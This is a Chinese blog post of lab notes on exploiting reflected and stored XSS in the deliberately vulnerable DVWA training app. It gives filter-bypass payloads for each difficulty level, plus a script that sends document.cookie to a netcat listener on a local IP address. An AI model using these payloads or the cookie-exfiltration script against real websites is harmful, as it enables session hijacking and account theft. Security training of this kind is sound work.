Xss-reflected/stored跨站脚本分析(Cross site scripting)

最新推荐文章于 2023-11-28 18:47:26 发布
最新推荐文章于 2023-11-28 18:47:26 发布
阅读量1.4k 收藏
点赞数
分类专栏: dvwa 文章标签: web 安全 html5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53914228/article/details/122143943
版权

Xss-reflected/stored跨站脚本分析(Cross site scripting)

基础知识

针对Dom - dochtml

Url概念:协议+网址/dns+端口+路径

XSS原理:对URL中的参数和对用户输入提交给web server的内容,没有进行充分的过滤。如果我们能够在web程序中对用户提交的URL中的参数,和提交的所有内容进行充分的过滤,将所有的不合法的参数和输入内容过滤掉,那么就不会导致“在用户的浏览器中执行攻击者自己定制的脚本”。

?name=<script>alert(document.cookie)</script>#

 

Php 会话id

Kali监听

Nc -nvlp  测试网络连通性

  1. ip地址、不用域名 v-详细输出 l-监听模式 p-端口号

192.168.184.195

新建标签

<script>var img=document.createElement("img");img.src="http://192.168.8.128:1234/?a="+escape(document.cookie);</script>#

 

Post 上传参数

Get获取参数

状态数值:

100

200 ok

400 服务器客户端问题

500 服务器客户端问题

实训过程

Reflected型

初级:直接写脚本语言

?name=<script>alert(document.cookie)</script>#

 

中级:大小写绕过、双写绕过

此处将<script>替换成了空格,所以可以大小写绕过或双写绕过

 

<scRipt>alert("666")</sCript>

<sc<script>ript>alert("666")</sc<script>ript>

高级:标签绕过

由源码可知,通配符过滤了/ script 而且无关大小写

<img src=1 οnerrοr=alert(document.cookie)>

<body οnlοad=alert(document.cookie)>

 

原理

 

stored型

看源代码,Name和message相比,防护性较低

其中:

stripslashes() 删除字符串中的反斜杠 /

mysqli_real_escape_string() 对特殊字符进行转意 \n \r \t

所以无法直接在前端上传脚本,用bp抓包,修改数据后,再发给服务器即可

 

初级:bp抓包,改数据,写脚本

 

中级:大小写绕过、双写绕过

<scRipt>alert("666")</sCript>

<sc<script>ript>alert("666")</sc<script>ript>

 

高级:标签绕过

<img src=1 οnerrοr=alert(document.cookie)>

<body οnlοad=alert(document.cookie)>

 

结果验证:均可弹出cookie窗口

 

春风拂槛露华浓。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss脚本【反射型---Reflected Cross Site Scripting (XSS)】
weixin_71169068的博客
03-29 655
脚本Cross-site scripting,XSS) 又称为脚本攻击,是一种经常出现在Web应用程序的安全漏洞攻击,也是代码注入的一种。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者用户可能采取Cookie窃取、会话劫持、钓鱼欺骗等各种攻击。这类攻击通常包含了HTML以及用户端脚本语言。
前端域问题
weixin_59907064的博客
09-03 1228
什么是域问题,域问题的解决方案
脚本漏洞XSS
qq_48904485的博客
03-22 8209
一、XSS脚本基础 1、XSS漏洞介绍 脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2、XSS漏洞原理 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执
webgoat-Cross Site Scripting XSS 脚本攻击
seanyang_的博客
11-28 819
本节课讲述了什么是XSS,并使用XSS执行那些非开发者本意的任务。
cross_site_scripting.pdf
05-21
cross_site_scripting.pdf
Stored Cross Site Scripting (XSS)
angry_program的博客
02-10 1273
前言 存储型XSS, 即Stored Cross Site Scripting (XSS), 也可以称为持久性的XSS, 顾名思义就是恶意代码存储在服务器或者数据库中, 恶意代码一般伴随着用户的评论发表、个人信息或者文章发表的地方, 如果没有过滤或者过滤不严格, 这些代码将会被存储在服务器中, 每当用户访问的时候, 恶意代码都会被触发, 造成大量cookie泄露, 甚至蠕虫。 下面对四种...
DVWA之Stored Cross Site Scripting (XSS)(小白适宜)
chtdgf的博客
02-19 295
DVWA之 Stored Cross Site Scripting (XSS) 1.LOW级别
Reflected Cross Site Scripting (XSS)
angry_program的博客
02-10 2504
前言 反射型XSS, 即 Reflected Cross Site Scripting (XSS),攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页面和内容),一般容易出现在搜索页面。 下面对四种不同等级的反射型XSS漏洞进行分析: Low 服务端核心代码: <?php header ("X-XSS-Prot...
DVWA 黑客攻防演练(十)反射型 XSS 攻击 Reflected Cross Site Scripting
weixin_30902675的博客
12-27 368
XSS (Cross-site scripting) 攻击,为和 CSS 有所区分,所以叫 XSS。又是一种防不胜防的攻击,应该算是一种 “HTML注入攻击”,原本开发者想的是显示数据,然而攻击者输入却是有破坏性的代码,而且能被解析执行。Symantec在2007年报告更是指出脚本漏洞大概占所有网漏洞的84%。 XSS 大致分成三种类型(白帽子讲web安全): 反射型,就是本文的内容。 存...
36-36.XSS脚本攻击课程介绍.mp4
05-10
36-36.XSS脚本攻击课程介绍.mp4
Cross-site Scripting
05-23
Cross-site Scripting
脚本攻击XSS(Cross Site Script)的原理与常见场景分析
10-18
XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的...这篇文章主要给大家介绍了关于脚本攻击XSS(Cross Site Script)的原理与常见场景的相关资料,需要的朋友可以参考下。
XSS.rar_XSS_cross scripting_cross site java_cross site scripting
09-14
Cross Site Scripting
xss脚本攻击-运维安全详细笔记
06-30
xss脚本攻击-运维安全详细笔记
40-40.XSS脚本攻击植入方式.mp4
最新发布
05-10
40-40.XSS脚本攻击植入方式.mp4
DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)
qq_43233085的博客
01-27 425
DVWA V1.9:Reflected Cross Site Scripting(存储型XSS)存储型 XSS 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 存储型 XSS 介绍 “脚本(XSS)”攻击是一种注入问题,其中恶意脚本被注入到其他良性的和可信的网中。 当攻击者使...
DVWA 之 Reflected Cross Site Scripting (XSS)
baynk的博客
10-29 1893
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ XSS,...
DVWA V1.9:Reflected Cross Site Scripting(反射型XSS)
qq_43233085的博客
01-27 537
DVWA V1.9:Reflected Cross Site Scripting(反射型XSS)反射型 XSS 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 反射型 XSS 介绍 “脚本(XSS)”攻击是一种注入问题,其中恶意脚本被注入到其他良性的和可信的网中。 当攻击者使...
DVWA系列---反射型 XSS(Reflected Cross Site Scripting
野原新之助
02-02 526
前言 何为XSS? XSS(Cross Site Scripting)名为脚本攻击,本应该称之为 CSS,但是由于 CSS 与网页前端的层叠式样表名称冲突,因此称之为 XSS。 XSS是指开发者在开发网页时,对用户的输入没有进行安全过滤,导致用户在可以输入内容的地方,插入脚本语句,执行恶意脚本代码,可以对数据库、服务器、用户等造成影响和危害,危险等级很高,也很常见。 XSS通常存在于论坛的评论...
js-xss-master/dist/test.html
10-02
js-xss是一个用于防御脚本攻击(XSS)的JavaScript库。它通过对输入的 HTML 进行过滤和转义,确保只有被允许的标签和属性能够被渲染,阻止恶意脚本的执行。 test.html是用来测试js-xss库功能的一个页面。在这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值